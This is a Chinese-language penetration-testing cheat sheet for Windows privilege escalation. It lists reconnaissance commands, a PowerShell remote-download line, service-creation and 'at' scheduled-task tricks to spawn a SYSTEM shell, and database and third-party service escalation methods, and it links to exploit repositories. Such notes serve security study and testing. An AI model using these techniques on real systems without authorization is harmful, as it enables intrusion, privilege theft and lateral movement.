常用信息收集命令
systeminfo 打印系统信息
whoami/priv 当前帐户权限
ipconfig/dispalydns 显示dns信息
route print 打印路由表
arp -a 打印arp表
net user 列出表名
net user username 关于用户的信息
net use \SMBPATH Pa$$wOrd/u:username 连接SMB
net localgroup 列出所有组
net view\127.0.0.1 会话打开到当前计算机
net session 开放给其他机器
netsh firewall show config 显示防火墙配置
DRIVERQUERY 列出安装的驱动
tasklist /svc 列出服务任务
net start 列出启动的服务
dir /s foo 在目录中搜索包含指定字符的项目
dir /s foo == bar 同上
sc query 列出所有服务
sc qc servicename 找到指定服务的路径
shutdown /r /t 0 重启
type file.txt 打印内容
icacls "C:\example" 列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn 列出已进安装的补丁
New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) 利用ps远程下载文件搭配本地
accesschk.exe -qwsu "Group" 修改对象
quser or query user 获取在线用户
netstat -ano | findstr 3389 获取rdp连接来源ip
dir c:\programdata\ 分析安装杀软
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口
tasklist /svc | find "TermService" + netstat -ano #获取远程端口
收集补丁信息:找到没有进行补丁的编号,尝试通过ms系列提权;
收集服务器作用:判断是否有可提权的服务或杀软服务,不同杀软不同绕过方式;
收集权限作用:根据权限来判断是否进行提权;
收集网络配置信息:可以后期横向扩展
windows提权
- 提权分类
系统溢出漏洞
第三方服务提权
数据库提权
本地提权
系统溢出提权
手工查找补丁情况:
systeminfo
Wmic qfe get Caption,Description,HotFixID,InstaslledON
MSF后渗透扫描:
post/windows/gather/enum_pathes
PowerShell扫描:
Imoprt-Mouble C:\Sherlock.ps1
Find-AllVulns
补丁漏洞查找网站:
https://github.com/ianxtianxt/win-exp-
https://github.com/SecWiki/windows-kernel-exploits
Psexec提权:
使用Psexec工具打开system权限的cmd窗口,其中:i 表示交互式,s 表示system移动到这个目录下,方便直接打开。
AT提权:
系统调度任务的命令
at 14:53 /interactive cmd
以system的权限打开cmd,之后在此cmd打开的应用都是system的权限
窗口权限提权:
在system权限的窗口中打开任务管理器(taskmgr),然后结束桌面进程,创建一个新的桌面进程(explorer),以后在桌面中打开的cmd窗口都是以system权限运行的。
服务方式提权:
采用服务方式提权,这是因为所有的服务都会默认以system账号去启动,所以借助这个思路,去创建一个服务(打开cmd服务),之后启动这个服务,打开的cmd命令行窗口就是以system权限启动的。
sc Create SuperCMD binpath= “cmd /k start” type= own type= interact
Sc start SuperCMD
Sc delete SuperCMD
注入进程提权:
Pinjector找一个system运行的服务进程,把自己注入到进程里面,注入到进程里面就和进程有同样的用户权限,即system
第三方服务提权
步骤:
信息收集阶段
收集软件的版本信息
收集软件目录端口信息
根据相关信息利用公开EXP提权
上传大马进行提权操作
针对不同软件有不同思路
1.FTP提权
serv-u 提权\G6-FTP提权\FileZilla提权\FlashFXP提权\PcAnywhere提权\Xlight FTP Server 提权
2.远程软件提权
VNC提权Radmin hash 提权漏洞
数据库提权
1.Mysql提权
udf提权
启动项提权
mof提权
2.SQL Server提权
利用xp_cmdshell提权
使用sp_oacreate进行提权
使用沙盒进行提权
3.Oracle提权
本地提权
1.溢出提权
远程溢出
本地溢出
2.Getpass提权
3.hash传递入侵
4.lpk提权
其他
- 常见的网站编译器
FCKeditor
eWebEditor
Cute Editor
Webhtmleditor
Kindeditor
Freetextbox
编译器详细讲解:https://www.jb51.net/article/26841.htm